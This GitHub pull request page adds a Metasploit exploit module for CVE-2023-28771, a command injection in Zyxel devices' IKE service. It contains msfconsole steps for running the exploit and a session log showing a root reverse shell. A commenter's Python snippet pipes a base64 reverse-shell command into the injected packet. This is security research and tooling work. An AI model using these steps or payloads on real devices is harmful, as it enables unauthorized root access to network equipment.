Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

CVE-2023-28771 - Zyxel Command Injection #18016

Merged
merged 4 commits into from Jun 9, 2023
Merged

CVE-2023-28771 - Zyxel Command Injection #18016

merged 4 commits into from Jun 9, 2023

Conversation

sfewer-r7
Copy link
Contributor

This module exploits CVE-2023-28771, a remote unauthenticated command injection vulnerability in the Internet Key Exchange (IKE) packet decoder over UDP port 500 on the WAN interface of several Zyxel devices. For a full technical analysis of the vulnerability read the Rapid7 AttackerKB Analysis.

Testing

A physical device is required for testing. The device must be running a vulnerable firmware version prior to the
vendor patch. A Zyxel USG FLEX 100 device was used during development and testing of this Metasploit module.

The attacker must be able to send UDP data to port 500 on the WAN interface of the affected network device.

Verification Steps

  1. Start msfconsole
  2. use exploit/linux/misc/zyxel_ike_decoder_rce_cve_2023_28771
  3. set RHOST <TARGET_WAN_IP>
  4. set LHOST eth0
  5. check
  6. exploit
  7. The default target 0 is a cmd/unix/reverse_bash payload. A root command shell session should be created.

jvoisin
jvoisin approved these changes May 23, 2023
View reviewed changes
Copy link
Contributor

@jvoisin jvoisin left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Amazing work!

@jheysel-r7
Copy link
Contributor

Thanks for the awesome module @sfewer-r7! Would you be able to include a pcap of the module running / exploiting the physical device? This would really help whoever ends up reviewing and landing this, cheers.

@sfewer-r7
Copy link
Contributor Author

sfewer-r7 commented May 25, 2023
edited

Thanks @jheysel-r7 , attached is a PCAP for the following session:

msf6 exploit(linux/misc/zyxel_ike_decoder_rce_cve_2023_28771) > show options

Module options (exploit/linux/misc/zyxel_ike_decoder_rce_cve_2023_28771):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS   192.168.86.40    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/usin
                                       g-metasploit.html
   RPORT    500              yes       The target port (UDP)
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  192.168.86.42    yes       The local host or network interface to listen on. This must be an address on the loca
                                       l machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (cmd/unix/reverse_bash):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.86.42    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux Command



View the full module info with the info, or info -d command.

msf6 exploit(linux/misc/zyxel_ike_decoder_rce_cve_2023_28771) > check
[*] 192.168.86.40:500 - The service is running, but could not be validated. IKE detected but device vendor and service version are unknown.
msf6 exploit(linux/misc/zyxel_ike_decoder_rce_cve_2023_28771) > exploit

[*] Started reverse TCP handler on 192.168.86.42:4444 
[*] Command shell session 1 opened (192.168.86.42:4444 -> 192.168.86.40:39127) at 2023-05-25 09:03:52 +0100

id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux usgflex100 3.10.87-rt80-Cavium-Octeon #2 SMP Tue Jan 4 18:13:49 CST 2022 mips64 Cavium Octeon III V0.2 FPU V0.0 ROUTER7000_REF (CN7020p1.2-1200-AAP) GNU/Linux
exit
[*] 192.168.86.40 - Command shell session 1 closed.
msf6 exploit(linux/misc/zyxel_ike_decoder_rce_cve_2023_28771) >

cve_2023_28771.pcapng.zip

@smcintyre-r7 smcintyre-r7 self-assigned this May 25, 2023
smcintyre-r7
smcintyre-r7 reviewed May 25, 2023
View reviewed changes
modules/exploits/linux/misc/zyxel_ike_decoder_rce_cve_2023_28771.rb Outdated
'DefaultOptions' => {
'PAYLOAD' => 'linux/mips64/meterpreter_reverse_tcp'
}
}
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

This should be able to be replaced with the new fetch payloads, however right now it's infeasible because we don't have a MIPS64 adapter. I'll see about adding one and then we can rebase this once that's done to include it.

@fullspectrumdev
Copy link

This is cursed, but the Python Meterpreter payload might work here.

I've been toying around with the exploit a little, and something like the following (Python) works... I've been playing with ever more lengthy python reverse shells/whatnot, but there is no reason a Python Meterpreter won't work.

    python_code = b'import socket,subprocess,os;s=socket.socket(s......[snipped]
    enc_python = base64.b64encode(python_code)
    command = f"echo '{enc_python.decode('ascii')}' | /usr/bin/base64 -d | /usr/bin/python"
    packet = build_packet(command) # build IKE packet with command
    send_packet(packet, ip, port)

@zeroSteiner zeroSteiner mentioned this pull request May 30, 2023
Merged
4 tasks
sfewer-r7 and others added 2 commits June 9, 2023 09:42
@sfewer-r7
Merge branch 'rapid7:master' into CVE-2023-28771
a152855
@sfewer-r7
rework the exploit to use the new MIPS64 fetch payload adapters. Remo…
27f5a78 
…ved the seperate command and dropper targets in favor of a single default target which can do both thanks to fetch payloads. Removed the redundant IO select() call which was bad copy pasta on my part.
@sfewer-r7
Copy link
Contributor Author

Hi @zeroSteiner I have rebased this pull request and reworked the module to support the fetch payloads. Tested and works great with a cmd/linux/http/mips64/meterpreter_reverse_tcp payload.

I have attached a PCAP cve_2023_28771.fetch.pcapng.zip of that working.

@smcintyre-r7 smcintyre-r7 merged commit 1284cb3 into rapid7:master Jun 9, 2023
30 checks passed
@smcintyre-r7
Copy link
Contributor

smcintyre-r7 commented Jun 9, 2023
edited by adfoster-r7

Release Notes

This adds an exploit for CVE-2023-28771 which is a remote, unauthenticated OS command injection in IKE service of several Zyxel devices. Successful exploitation results in remote command execution as the root user.

@adfoster-r7 adfoster-r7 added the rn-modules release notes for new or majorly enhanced modules label Jun 16, 2023
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@jvoisin jvoisin jvoisin approved these changes

@smcintyre-r7 smcintyre-r7 smcintyre-r7 approved these changes

Assignees

@smcintyre-r7 smcintyre-r7

Labels
docs module rn-modules release notes for new or majorly enhanced modules
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
7 participants
@sfewer-r7 @jheysel-r7 @fullspectrumdev @smcintyre-r7 @jvoisin @adfoster-r7 @gwillcox-r7